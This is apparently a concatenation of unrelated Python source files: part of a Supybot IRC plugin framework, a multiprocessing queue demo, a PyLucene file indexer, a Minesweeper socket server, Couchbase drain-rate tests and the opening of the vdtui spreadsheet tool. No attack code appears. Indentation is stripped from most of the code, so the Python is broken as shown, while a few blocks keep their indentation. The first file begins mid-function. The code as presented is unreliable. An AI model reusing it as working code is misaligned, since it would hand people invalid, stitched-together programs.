# Let "P" be the plugin and "X Y" the command name. The
# fullCommandName is "P X Y"
# check "Y"
cap = checkCommandCapability(msg, self, command[-1])
if cap:
irc.errorNoCapability(cap)
return
# check "P", "P.X", and "P.X.Y"
prefix = []
for name in fullCommandName:
prefix.append(name)
cap = checkCommandCapability(msg, self, prefix)
if cap:
irc.errorNoCapability(cap)
return
try:
self.callingCommand = command
self.callCommand(command, irc, msg, *args, **kwargs)
finally:
self.callingCommand = None
except SilentError:
pass
except (getopt.GetoptError, ArgumentError) as e:
self.log.debug('Got %s, giving argument error.',
utils.exnToString(e))
help = self.getCommandHelp(command)
if 'command has no help.' in help:
# Note: this case will never happen, unless 'checkDoc' is set
# to False.
irc.error(_('Invalid arguments for %s.') % formatCommand(command))
else:
irc.reply(help)
except (SyntaxError, Error) as e:
self.log.debug('Error return: %s', utils.exnToString(e))
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in %s.', command)
if conf.supybot.reply.error.detailed():
irc.error(utils.exnToString(e))
else:
irc.replyError(msg=msg)
def getCommandHelp(self, command, simpleSyntax=None):
method = self.getCommandMethod(command)
help = getHelp
chan = None
net = None
if dynamic.msg is not None:
chan = dynamic.msg.channel
if dynamic.irc is not None:
net = dynamic.irc.network
if simpleSyntax is None:
simpleSyntax = conf.get(conf.supybot.reply.showSimpleSyntax,
channel=chan, network=net)
if simpleSyntax:
help = getSyntax
if hasattr(method, '__doc__'):
return help(method, name=formatCommand(command))
else:
return format(_('The %q command has no help.'),
formatCommand(command))
class PluginMixin(BasePlugin, irclib.IrcCallback):
public = True
alwaysCall = ()
threaded = False
noIgnore = False
classModule = None
Proxy = NestedCommandsIrcProxy
def __init__(self, irc):
myName = self.name()
self.log = log.getPluginLogger(myName)
self.__parent = super(PluginMixin, self)
self.__parent.__init__(irc)
# We can't do this because of the specialness that Owner and Misc do.
# I guess plugin authors will have to get the capitalization right.
# self.callAfter = map(str.lower, self.callAfter)
# self.callBefore = map(str.lower, self.callBefore)
def canonicalName(self):
return canonicalName(self.name())
def __call__(self, irc, msg):
irc = SimpleProxy(irc, msg)
if msg.command == 'PRIVMSG':
if hasattr(self.noIgnore, '__call__'):
noIgnore = self.noIgnore(irc, msg)
else:
noIgnore = self.noIgnore
if noIgnore or \
not ircdb.checkIgnored(msg.prefix, msg.channel) or \
not ircutils.isUserHostmask(msg.prefix): # Some services impl.
self.__parent.__call__(irc, msg)
else:
self.__parent.__call__(irc, msg)
def registryValue(self, name, channel=None, network=None, value=True):
if isinstance(network, bool):
# Network-unaware plugin that uses 'value' as a positional
# argument.
(network, value) = (value, network)
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if channel or network:
group = group.getSpecific(network=network, channel=channel)
if value:
return group()
else:
return group
def setRegistryValue(self, name, value, channel=None, network=None):
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if network:
group = group.get(':' + network)
if channel:
group = group.get(channel)
group.setValue(value)
def userValue(self, name, prefixOrName, default=None):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
return None
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
return group.get(id)()
def setUserValue(self, name, prefixOrName, value,
ignoreNoUser=True, setValue=True):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
if ignoreNoUser:
return
else:
raise
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
group = group.get(id)
if setValue:
group.setValue(value)
else:
group.set(value)
def getPluginHelp(self):
if hasattr(self, '__doc__'):
return self.__doc__
else:
return None
class Plugin(PluginMixin, Commands):
pass
Privmsg = Plugin # Backwards compatibility.
class PluginRegexp(Plugin):
"""Same as Plugin, except allows the user to also include regexp-based
callbacks. All regexp-based callbacks must be specified in the set (or
list) attribute "regexps", "addressedRegexps", or "unaddressedRegexps"
depending on whether they should always be triggered, triggered only when
the bot is addressed, or triggered only when the bot isn't addressed.
"""
flags = re.I
regexps = ()
"""'regexps' methods are called whether the message is addressed or not."""
addressedRegexps = ()
"""'addressedRegexps' methods are called only when the message is addressed,
and then, only with the payload (i.e., what is returned from the
    'addressed' function)."""
unaddressedRegexps = ()
"""'unaddressedRegexps' methods are called only when the message is *not*
addressed."""
Proxy = SimpleProxy
def __init__(self, irc):
self.__parent = super(PluginRegexp, self)
self.__parent.__init__(irc)
self.res = []
self.addressedRes = []
self.unaddressedRes = []
for name in self.regexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.res.append((r, name))
for name in self.addressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.addressedRes.append((r, name))
for name in self.unaddressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.unaddressedRes.append((r, name))
def _callRegexp(self, name, irc, msg, m):
method = getattr(self, name)
try:
method(irc, msg, m)
except Error as e:
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in _callRegexp:')
def invalidCommand(self, irc, msg, tokens):
s = ' '.join(tokens)
for (r, name) in self.addressedRes:
for m in r.finditer(s):
self._callRegexp(name, irc, msg, m)
def doPrivmsg(self, irc, msg):
if msg.isError:
return
proxy = self.Proxy(irc, msg)
if not msg.addressed:
for (r, name) in self.unaddressedRes:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
for (r, name) in self.res:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
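# Minimal sketch of a regexp-based plugin (hypothetical, based on the class
# above: each listed method's docstring is compiled as its regexp and the
# method receives the match object):
#
#   class Greeter(PluginRegexp):
#       regexps = ('hello',)
#
#       def hello(self, irc, msg, match):
#           r"hello\s+(?P<who>\S+)"
#           irc.reply('hi, %s' % match.group('who'))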
PrivmsgCommandAndRegexp = PluginRegexp
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
multiprocess.py
|
import time
import multiprocessing
from multiprocessing import Process, Queue, Manager
CPU_NUM = multiprocessing.cpu_count()
class Task():
def __init__(self, i):
self.num = i
def work(self, i):
while True:
time.sleep(2)
print('working: ', i)
def start(self):
self.proc = Process(target=self.work, args=(self.num,))
self.proc.start()
# taskList = []
# for i in range(CPU_NUM):
# task = Task(i)
# task.start()
# taskList.append(task)
container = Queue(maxsize=10)
def processPro(gvalue):
    # Producer: drop the oldest timestamp when the queue is full, then push
    # the current time and mirror it into the shared Manager dict.
    while True:
        if container.full():
            ele = container.get()
            print('pro', ele)
        current = time.time()
        container.put(current)
        gvalue['time'] = current
        time.sleep(0.1)
def processCon(gvalue, no):
    # Consumer: pull a timestamp off the queue and report both it and the
    # latest value published in the shared dict.
    while True:
        ele = container.get()
        print(no, ele)
        print("{no}, current: {current}".format(no=no, current=gvalue['time']))
        time.sleep(1)
def main():
gValue = Manager().dict({'time': 0})
pro = Process(target=processPro, args=(gValue,))
pro.start()
for i in range(5):
pro = Process(target=processCon, args=(gValue, i))
pro.start()
while True:
print('main: ', gValue['time'])
time.sleep(2)
if __name__ == '__main__':
    # Guard the entry point so child processes spawned by multiprocessing do
    # not re-execute main() when they import this module.
    main()
|
IndexFiles.py
|
#!/usr/bin/env python
INDEX_DIR = "IndexFiles.index"
import sys, os, lucene, threading, time, re
from datetime import datetime
from java.io import File
from org.apache.lucene.analysis.miscellaneous import LimitTokenCountAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import FieldInfo, IndexWriter, IndexWriterConfig
from org.apache.lucene.store import SimpleFSDirectory
from org.apache.lucene.util import Version
"""
This class is loosely based on the Lucene (java implementation) demo class
org.apache.lucene.demo.IndexFiles. It will take a directory as an argument
and will index all of the files in that directory and downward recursively.
It will index on the file path, the file name and the file contents. The
resulting Lucene index will be placed in the current directory and called
'index'.
"""
class Ticker(object):
def __init__(self):
self.tick = True
def run(self):
while self.tick:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(1.0)
class IndexFiles(object):
"""Usage: python IndexFiles <doc_directory>"""
def __init__(self, root, storeDir, analyzer):
if not os.path.exists(storeDir):
os.mkdir(storeDir)
store = SimpleFSDirectory(File(storeDir))
analyzer = LimitTokenCountAnalyzer(analyzer, 1048576)
config = IndexWriterConfig(Version.LUCENE_CURRENT, analyzer)
config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
writer = IndexWriter(store, config)
self.indexDocs(root, writer)
ticker = Ticker()
print 'commit index',
threading.Thread(target=ticker.run).start()
writer.commit()
writer.close()
ticker.tick = False
print 'done'
def getTxtAttribute(self, contents, attr):
m = re.search(attr + ': (.*?)\n',contents)
if m:
return m.group(1)
else:
return ''
def indexDocs(self, root, writer):
#t1 = FieldType()
#t1.setIndexed(True)
#t1.setStored(True)
#t1.setTokenized(False)
#t1.setIndexOptions(FieldInfo.IndexOptions.DOCS_AND_FREQS)
#t2 = FieldType()
#t2.setIndexed(True)
#t2.setStored(False)
#t2.setTokenized(True)
#t2.setIndexOptions(FieldInfo.IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
for root, dirnames, filenames in os.walk(root):
for filename in filenames:
if not filename.endswith('.txt'):
continue
print "adding", filename
try:
path = os.path.join(root, filename)
file = open(path)
contents = file.read().decode('utf8', 'ignore')
file.close()
doc = Document()
doc.add(Field("name", filename,
Field.Store.YES,
Field.Index.NOT_ANALYZED))
doc.add(Field("path", path,
Field.Store.YES,
Field.Index.NOT_ANALYZED))
if len(contents) > 0:
title = self.getTxtAttribute(contents, 'Title')
author = self.getTxtAttribute(contents, 'Author')
language = self.getTxtAttribute(contents, 'Language')
doc.add(Field("title", title,
Field.Store.YES,
Field.Index.ANALYZED))
doc.add(Field("author", author,
Field.Store.YES,
Field.Index.ANALYZED))
doc.add(Field("language", language,
Field.Store.YES,
Field.Index.ANALYZED))
doc.add(Field("contents", contents,
Field.Store.NO,
Field.Index.ANALYZED))
else:
print "warning: no content in %s" % filename
writer.addDocument(doc)
except Exception, e:
print "Failed in indexDocs:", e
if __name__ == '__main__':
"""
if len(sys.argv) < 2:
print IndexFiles.__doc__
sys.exit(1)
"""
lucene.initVM(vmargs=['-Djava.awt.headless=true'])
print 'lucene', lucene.VERSION
start = datetime.now()
try:
"""
base_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
IndexFiles(sys.argv[1], os.path.join(base_dir, INDEX_DIR),
StandardAnalyzer(Version.LUCENE_CURRENT))
"""
analyzer = StandardAnalyzer(Version.LUCENE_CURRENT)
IndexFiles('testfolder', "index", analyzer)
end = datetime.now()
print end - start
except Exception, e:
print "Failed: ", e
raise e
|
MineSweeperServer.py
|
import socket
import threading
import time
import random
import operator
Players=[]
stop = False
timer = 1
playerNum = 0
score = 0
playerScores = {}
echo_queue = []
minecoord = []
neighborCoord = []
status = ''
neighbor = []
checkcoord = []
NeighborMines = []
up_right, up_left, up, left, right, down_left, down_right, down = [], [], [], [] ,[] ,[] ,[] ,[]
removedcoord = []
# Generate random mines and put them into the neighborCoord and minecoord lists
for i in range(0, 40):
x = random.randrange(1, 17)
y = random.randrange(1, 17)
coord = x, y
neighborCoord.append(coord)
minecoord.append(str(x) + ',' + str(y))
# Keep track of the score for each player
def scoreKeeper(playerNum, score):
    global playerScores
    playerScores[playerNum] = score  # update this player's entry without discarding the other scores
    print(playerScores)
# Return the set of mines adjacent to the clicked coordinates
def checkMine(clickcoord, neighborCoord):
if ':' not in clickcoord:
clickcoord = clickcoord.split(',')
x = clickcoord[0]
x = int(x)
y = clickcoord[1]
y = int(y)
up_right = x + 1, y + 1
checkcoord.append(up_right)
up_left = x -1, y + 1
checkcoord.append(up_left)
up = x, y + 1
checkcoord.append(up)
left = x - 1, y
checkcoord.append(left)
right = x + 1, y
checkcoord.append(right)
down_right = x + 1, y - 1
checkcoord.append(down_right)
down_left = x - 1, y - 1
checkcoord.append(down_left)
down = x, y - 1
checkcoord.append(down)
NeighborMines = set(neighborCoord).intersection(checkcoord)
del checkcoord[:] #Erase the surrounding coordinates for the next click coordinates
return(NeighborMines)
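# Illustrative example (hypothetical board state): if the mines include (3, 4)
# and (5, 5), then checkMine('4,4', neighborCoord) inspects the eight cells
# around (4, 4) and returns {(3, 4), (5, 5)}, so the client can display a
# neighbour count of 2 for that square.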
# Receive packets from each minesweeper client
def clientecho (sock, score, playerNum):
global removedcoord
global minecoord
while True:
data = sock.recv(4096)
clickcoord = data.decode()
clickcoord = str(clickcoord)
if 'I WIN!' in clickcoord:
print('last mine')
print('game over')
Winner = '1'
print('Player ' + Winner + ' won!')
status = 'Winner'
else:
SendNeighbors = checkMine(clickcoord, neighborCoord)
            # A ':' in the coordinates marks a flag placement; plain
            # ','-separated coordinates are ordinary reveals.
if ':' not in clickcoord:
if any(x in clickcoord for x in removedcoord):
status = 'used'
elif any(x in clickcoord for x in minecoord):
removedcoord.append(str(clickcoord))
if clickcoord in minecoord:
minecoord.remove(clickcoord)
else:
status = 'MINE!'
if len(minecoord)== 0:
print('last mine')
print('game over')
                        Winner = max(playerScores.items(), key=operator.itemgetter(1))[0] #Determine the winner by comparing scores
print('Player ' + Winner + ' won!')
status = 'Winner'
else:
score = score - 5 #Deduct points for clicking mine
else:
status = 'CLEAR' #Clear spot, there is no mine
if len(SendNeighbors) >= 1: #add a point to score if the click coordinates are next to a mine
score = score + 1
else:
score = score + 0
            # Coordinates containing ':' (and therefore no ',') are flag placements
elif ',' not in clickcoord:
flagcoord = clickcoord.replace(':',',')
print(flagcoord)
print(minecoord)
if any(x in flagcoord for x in minecoord):
minecoord.remove(str(flagcoord))
status = 'FlaggedMine'
score = score + 1
if len(minecoord)== 0:
print('last mine')
print('game over')
                        Winner = max(playerScores.items(), key=operator.itemgetter(1))[0] #Determine the winner by comparing scores
print('Player ' + Winner + ' won!')
status = 'Winner'
else:
status = 'FlaggedCLEAR' #Clear spot, there is no mine
score = score + 0
sendScore = str(score)
if ':' not in clickcoord:
NumNeighbors = len(SendNeighbors)
NumNeighbors = str(NumNeighbors)
sock.send(str.encode(NumNeighbors))
else:
NumNeighbors = '0'
sock.send(str.encode(NumNeighbors))
sock.send(str.encode(sendScore))
sock.send(str.encode(status))
        scoreKeeper(playerNum, score) #Update the player score in the shared dict
if data:
peerName = sock.getpeername()
scoreList = peerName, score
if data.decode() != "getmesome":
queuelock.acquire()
echo_queue.append(data.decode())
queuelock.release()
else:
queuelock.acquire()
data = echo_queue[0]
del echo_queue[0]
queuelock.release()
sock.send(b"Echoing: " + str.encode(data))
else:
print("Ending connection with: ", sock.getpeername())
sock.close()
break
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 2001))
sock.listen(5)
queuelock = threading.Lock()
while True:
scoreKeeper(playerNum, 0)
clientsock, addr = sock.accept()
playerNum += 1
Players.append(addr[1])
t = threading.Thread(target=clientecho, args=(clientsock, score, playerNum))
t.start()
|
drainratetests.py
|
from threading import Thread
import unittest
import time
from TestInput import TestInputSingleton
import logger
import datetime
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import MemcachedClientHelper
from security.rbac_base import RbacBase
class DrainRateTests(unittest.TestCase):
def setUp(self):
self.log = logger.Logger.get_logger()
self.input = TestInputSingleton.input
self.assertTrue(self.input, msg="input parameters missing...")
self.master = self.input.servers[0]
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
self.bucket = "default"
self.number_of_items = -1
# Add built-in user
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin', self.master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list, RestConnection(self.master), 'builtin')
self._create_default_bucket()
self.drained_in_seconds = -1
self.drained = False
self.reader_shutdown = False
self._log_start()
def tearDown(self):
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
rest = RestConnection(self.master)
# Remove rbac user in teardown
role_del = ['cbadminbucket']
temp = RbacBase().remove_user_role(role_del, rest)
self._log_finish()
def _log_start(self):
try:
msg = "{0} : {1} started ".format(datetime.datetime.now(), self._testMethodName)
            RestConnection(self.master).log_client_error(msg)
except:
pass
def _log_finish(self):
try:
msg = "{0} : {1} finished ".format(datetime.datetime.now(), self._testMethodName)
            RestConnection(self.master).log_client_error(msg)
except:
pass
def _create_default_bucket(self, replica=1):
name = "default"
self.bucket_storage = self.input.param("bucket_storage", 'couchstore')
master = self.input.servers[0]
rest = RestConnection(master)
helper = RestHelper(RestConnection(master))
if not helper.bucket_exists(name):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.input.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * node_ram_ratio
if(available_ram < 256):
available_ram = 256
rest.create_bucket(bucket=name, ramQuotaMB=int(available_ram),
replicaNumber=replica,
storageBackend=self.bucket_storage)
ready = BucketOperationHelper.wait_for_memcached(master, name)
self.assertTrue(ready, msg="wait_for_memcached failed")
self.assertTrue(helper.bucket_exists(name),
msg="unable to create {0} bucket".format(name))
def _load_data_for_buckets(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
distribution = {128: 1.0}
self.bucket_data = {}
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
self.bucket_data[name] = {}
self.bucket_data[name]["inserted_keys"], self.bucket_data[name]["rejected_keys"] = \
MemcachedClientHelper.load_bucket_and_return_the_keys(name=self.bucket,
servers=[self.master],
value_size_distribution=distribution,
number_of_threads=1,
number_of_items=self.number_of_items,
write_only=True)
def _parallel_read(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
while not self.reader_shutdown:
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
mc = MemcachedClientHelper.direct_client(self.master, name)
for key in self.bucket_data[name]["inserted_keys"]:
mc.get(key)
def _monitor_drain_queue(self):
#start whenever drain_queue is > 0
rest = RestConnection(self.master)
start = time.time()
self.log.info("wait 2 seconds for bucket stats are up")
time.sleep(2)
stats = rest.get_bucket_stats(self.bucket)
self.log.info("current ep_queue_size: {0}".format(stats["ep_queue_size"]))
self.drained = RebalanceHelper.wait_for_persistence(self.master, self.bucket, timeout=300)
self.drained_in_seconds = time.time() - start
def _test_drain(self, parallel_read=False):
reader = None
loader = Thread(target=self._load_data_for_buckets)
loader.start()
self.log.info("waiting for loader thread to insert {0} items".format(self.number_of_items))
loader.join()
wait_for_queue = Thread(target=self._monitor_drain_queue)
wait_for_queue.start()
if parallel_read:
reader = Thread(target=self._parallel_read)
reader.start()
self.log.info("waiting for ep_queue == 0")
wait_for_queue.join()
self.log.info("took {0} seconds to drain {1} items".format(self.drained_in_seconds, self.number_of_items))
if parallel_read:
self.reader_shutdown = True
reader.join()
self.assertTrue(self.drained, "failed to drain all items")
def test_drain_10k_items_parallel_read(self):
self.number_of_items = 10 * 1000
self._test_drain(True)
def test_drain_10k_items(self):
self.number_of_items = 10 * 1000
self._test_drain()
def test_drain_100k_items(self):
self.number_of_items = 100 * 1000
self._test_drain()
def test_drain_100k_items_parallel_read(self):
self.number_of_items = 100 * 1000
self._test_drain(True)
def test_drain_1M_items(self):
self.number_of_items = 1 * 1000 * 1000
self._test_drain()
def test_drain_1M_items_parallel_read(self):
self.number_of_items = 1 * 1000 * 1000
self._test_drain(True)
|
vdtui.py
|
#!/usr/bin/env python3
#
# Copyright 2017 Saul Pwanson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import _curses
__version__ = 'saul.pw/vdtui v0.95.1'
__author__ = 'Saul Pwanson <vdtui@saul.pw>'
__license__ = 'MIT'
__status__ = 'Beta'
import collections
import copy
import curses
import datetime
import functools
import io
import itertools
import os
import os.path
import re
import string
import textwrap
import threading
import time
from builtins import *
class EscapeException(Exception):
pass
baseCommands = collections.OrderedDict()
baseOptions = collections.OrderedDict()
def command(keystrokes, execstr, helpstr):
if isinstance(keystrokes, str):
keystrokes = [keystrokes]
for ks in keystrokes:
baseCommands[ks] = (ks, helpstr, execstr)
def alias(new, existing):
_, helpstr, execstr = baseCommands[existing]
command(new, execstr, helpstr)
class configbool:
def __init__(self, v):
if isinstance(v, str):
self.val = v and (v[0] not in "0fFnN")
else:
self.val = bool(v)
def __bool__(self):
return self.val
def __str__(self):
return str(self.val)
def option(name, default, helpstr=''):
if isinstance(default, bool):
default = configbool(default)
baseOptions[name] = [name, default, default, helpstr] # see OptionsObject
theme = option
option('debug', False, 'abort on error and display stacktrace')
option('readonly', False, 'disable saving')
option('encoding', 'utf-8', 'as passed to codecs.open')
option('encoding_errors', 'surrogateescape', 'as passed to codecs.open')
option('field_joiner', ' ', 'character used to join string fields')
option('sheetname_joiner', '~', 'string joining multiple sheet names')
option('curses_timeout', 100, 'curses timeout in ms')
option('default_width', 20, 'default column width')
option('regex_flags', 'I', 'flags to pass to re.compile() [AILMSUX]')
option('num_colors', 0, 'force number of colors to use')
option('maxlen_col_hdr', 2, 'maximum length of column-header strings')
option('textwrap', True, 'if TextSheet breaks rows to fit in windowWidth')
option('force_valid_names', False, 'force column names to be valid Python identifiers')
theme('disp_truncator', '…')
theme('disp_key_sep', '/')
theme('disp_format_exc', '?')
theme('disp_getter_exc', '!')
theme('disp_edit_fill', '_', 'edit field fill character')
theme('disp_more_left', '<', 'display cue in header indicating more columns to the left')
theme('disp_more_right', '>', 'display cue in header indicating more columns to the right')
theme('disp_column_sep', '|', 'chars between columns')
theme('disp_keycol_sep', '\u2016', 'chars between keys and rest of columns')
theme('disp_error_val', '¿', 'displayed contents when getter fails due to exception')
theme('disp_none', '', 'visible contents of a cell whose value was None')
theme('color_current_row', 'reverse')
theme('color_default', 'normal')
theme('color_selected_row', '215 yellow')
theme('color_format_exc', '48 bold yellow')
theme('color_getter_exc', 'red bold')
theme('color_current_col', 'bold')
theme('color_current_hdr', 'reverse underline')
theme('color_key_col', '81 cyan')
theme('color_default_hdr', 'bold underline')
theme('color_column_sep', '246 blue')
theme('disp_status_sep', ' | ', 'string separating multiple statuses')
theme('disp_unprintable', '.', 'a substitute character for unprintables')
theme('disp_column_fill', ' ', 'pad chars after column value')
theme('disp_oddspace', '\u00b7', 'displayable character for odd whitespace')
theme('color_status', 'bold', 'status line color')
theme('color_edit_cell', 'normal', 'edit cell color')
theme('disp_status_fmt', '{sheet.name}| ', 'status line prefix')
theme('unicode_ambiguous_width', 1, 'width to use for unicode chars marked ambiguous')
ENTER = '^J'
ESC = '^['
command('q', 'vd.sheets.pop(0)', 'quit the current sheet')
command(['h', 'KEY_LEFT'], 'cursorRight(-1)', 'go one column left')
command(['j', 'KEY_DOWN'], 'cursorDown(+1)', 'go one row down')
command(['k', 'KEY_UP'], 'cursorDown(-1)', 'go one row up')
command(['l', 'KEY_RIGHT'], 'cursorRight(+1)', 'go one column right')
command(['^F', 'KEY_NPAGE', 'kDOWN'], 'cursorDown(nVisibleRows); sheet.topRowIndex += nVisibleRows',
'scroll one page down')
command(['^B', 'KEY_PPAGE', 'kUP'], 'cursorDown(-nVisibleRows); sheet.topRowIndex -= nVisibleRows',
'scroll one page up')
#command('gq', 'vd.sheets.clear()', 'drop all sheets (clean exit)')
command('gh', 'sheet.cursorVisibleColIndex = sheet.leftVisibleColIndex = nKeys', 'go to leftmost non-key column')
command('gk', 'sheet.cursorRowIndex = sheet.topRowIndex = 0', 'go to top row')
command('gj', 'sheet.cursorRowIndex = len(rows); sheet.topRowIndex = cursorRowIndex-nVisibleRows', 'go to bottom row')
command('gl', 'sheet.cursorVisibleColIndex = len(visibleCols)-1', 'go to rightmost column')
alias('gg', 'gk')
alias('G', 'gj')
alias('KEY_HOME', 'gk')
alias('KEY_END', 'gj')
command('^L', 'vd.scr.clear()', 'redraw entire terminal screen')
command('^G', 'status(statusLine)', 'show info for the current sheet')
#command('^V', 'status(__version__)', 'show version information')
command('<',
'moveToNextRow(lambda row,sheet=sheet,col=cursorCol,val=cursorValue: col.getValue(row) != val, reverse=True) or status("no different value up this column")',
'move up to previous value in this column')
command('>',
'moveToNextRow(lambda row,sheet=sheet,col=cursorCol,val=cursorValue: col.getValue(row) != val) or status("no different value down this column")',
'move down to next value in this column')
command('{',
'moveToNextRow(lambda row,sheet=sheet: sheet.isSelected(row), reverse=True) or status("no previous selected row")',
'move to previous selected row')
command('}', 'moveToNextRow(lambda row,sheet=sheet: sheet.isSelected(row)) or status("no next selected row")',
'move to next selected row')
#command('_', 'cursorCol.toggleWidth(cursorCol.getMaxWidth(visibleRows))',
# 'toggle this column width between default_width and to fit visible values')
command('-', 'cursorCol.width = 0', 'hide this column')
#command('g_', 'for c in visibleCols: c.width = c.getMaxWidth(visibleRows)',
# 'set width of all columns to fit visible cells')
command('[', 'rows.sort(key = lambda x, col= cursorColIndex: x[col])', 'sort by this column ascending')
command(']', 'rows.sort(key = lambda x, col= cursorColIndex: x[col], reverse=True)', 'sort by this column descending')
#command('^D', 'options.debug = not options.debug; status("debug " + ("ON" if options.debug else "OFF"))',
# 'toggle debug mode')
#command('^E', 'vd.lastErrors and vd.push(TextSheet("last_error", vd.lastErrors[-1])) or status("no error")',
# 'open stack trace for most recent error')
#command('^^', 'vd.sheets[0], vd.sheets[1] = vd.sheets[1], vd.sheets[0]', 'jump to previous sheet')
#command('g^E', 'vd.push(TextSheet("last_errors", "\\n\\n".join(vd.lastErrors)))', 'open most recent errors')
#command('^R', 'reload(); recalc(); status("reloaded")', 'reload sheet from source')
command('/', 'moveRegex(regex=input("/", type="regex"), columns="cursorCol", backward=False)',
'search this column forward for regex')
command('?', 'moveRegex(regex=input("?", type="regex"), columns="cursorCol", backward=True)',
'search this column backward for regex')
command('n', 'moveRegex(reverse=False)', 'go to next match')
command('p', 'moveRegex(reverse=True)', 'go to previous match')
command('g/', 'moveRegex(regex=input("g/", type="regex"), backward=False, columns="visibleCols")',
'search regex forward in all visible columns')
command('g?', 'moveRegex(regex=input("g?", type="regex"), backward=True, columns="visibleCols")',
'search regex backward in all visible columns')
#command('e', 'cursorCol.setValues([cursorRow], editCell(cursorVisibleColIndex)); sheet.cursorRowIndex += 1',
# 'edit this cell')
#command('ge', 'cursorCol.setValues(selectedRows, input("set selected to: ", value=cursorValue))',
# 'edit this column for all selected rows')
#command('d', 'rows.pop(cursorRowIndex)', 'delete this row')
#command('gd', 'deleteSelected()', 'delete all selected rows')
command(' ', 'toggle([cursorRow]); cursorDown(1)', 'toggle select of this row')
command('s', 'select([cursorRow]); cursorDown(1)', 'select this row')
command('u', 'unselect([cursorRow]); cursorDown(1)', 'unselect this row')
#command('|', 'selectByIdx(searchRegex(regex=input("|", type="regex"), columns="cursorCol"))',
# 'select rows by regex matching this columns')
#command('\\', 'unselectByIdx(searchRegex(regex=input("\\\\", type="regex"), columns="cursorCol"))',
# 'unselect rows by regex matching this columns')
#command('g ', 'toggle(rows)', 'toggle select of all rows')
#command('gs', 'select(rows)', 'select all rows')
command('gu', '_selectedRows.clear()', 'unselect all rows')
#command('g|', 'selectByIdx(searchRegex(regex=input("g|", type="regex"), columns="visibleCols"))',
# 'select rows by regex matching any visible column')
#command('g\\', 'unselectByIdx(searchRegex(regex=input("g\\\\", type="regex"), columns="visibleCols"))',
# 'unselect rows by regex matching any visible column')
#command(',', 'select(gatherBy(lambda r,c=cursorCol,v=cursorValue: c.getValue(r) == v), progress=False)',
# 'select rows matching by this column')
#command('g,', 'select(gatherBy(lambda r,v=cursorRow: r == v), progress=False)', 'select all rows that match this row')
#command('"', 'vd.push(sheet.copy("_selected")).rows = list(sheet.selectedRows)',
# 'push duplicate sheet with only selected rows')
#command('g"', 'vd.push(sheet.copy())', 'push duplicate sheet')
#command('V', 'vd.push(TextSheet("%s[%s].%s" % (name, cursorRowIndex, cursorCol.name), cursorValue))',
# 'view readonly contents of this cell in a new sheet')
#command('`', 'vd.push(source if isinstance(source, Sheet) else None)', 'push source sheet')
#command('S', 'vd.push(SheetsSheet())', 'open Sheet stack')
#command('C', 'vd.push(ColumnsSheet(sheet))', 'open Columns for this sheet')
#command('O', 'vd.push(vd.optionsSheet)', 'open Options for this sheet')
command('z?', 'vd.push(HelpSheet(name + "_commands", sheet))', 'open command help sheet')
alias('KEY_F(1)', 'z?')
# VisiData uses Python native int, float, str, and adds simple date, currency, and anytype.
#
# A type T is used internally in these ways:
# o = T(str) # for conversion from string
# o = T() # for default value to be used when conversion fails
#
# The resulting object o must be orderable and convertible to a string for display and certain outputs (like csv).
## minimalist 'any' type
def anytype(r=''):
return str(r)
anytype.__name__ = ''
option('float_chars', '+-0123456789.eE_', 'valid numeric characters')
def currency(s):
'a `float` with any leading and trailing non-numeric characters stripped'
